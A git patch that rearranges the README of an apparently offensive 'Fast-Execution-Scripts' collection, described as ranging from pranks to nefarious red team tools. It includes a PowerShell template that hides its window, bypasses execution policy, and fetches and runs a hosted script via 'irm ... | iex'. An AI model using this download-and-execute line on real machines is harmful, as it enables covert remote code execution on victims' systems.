From d41fa235a62c9ae455d7fca68436f1cbfd2cf536 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Sun, 17 Sep 2023 19:37:23 +0100 Subject: [PATCH] Update README.md --- Fast-Execution-Scripts/README.md | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/Fast-Execution-Scripts/README.md b/Fast-Execution-Scripts/README.md index 63dd01d..3aab083 100644 --- a/Fast-Execution-Scripts/README.md +++ b/Fast-Execution-Scripts/README.md @@ -2,10 +2,6 @@ Easy to setup with tutorials for web hooks etc below... -**THESE SCRIPTS DOWNLOAD AND RUN FROM THIS REPO (Parent .ps1 scripts)-** - -https://github.com/beigeworm/assets/tree/main/Scripts - They use this cmd > `STRING powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex` These scripts range from harmless pranks to nefarious red team tools. For educational purposes only! @@ -17,4 +13,6 @@ https://github.com/beigeworm/Powershell-Tools-and-Toys # Pre-Deployment Setup Most of these scripts will require some setup before they will work. +**THESE SCRIPTS DOWNLOAD AND RUN FROM THIS REPO (Parent .ps1 scripts)-** +https://github.com/beigeworm/assets/tree/main/Scripts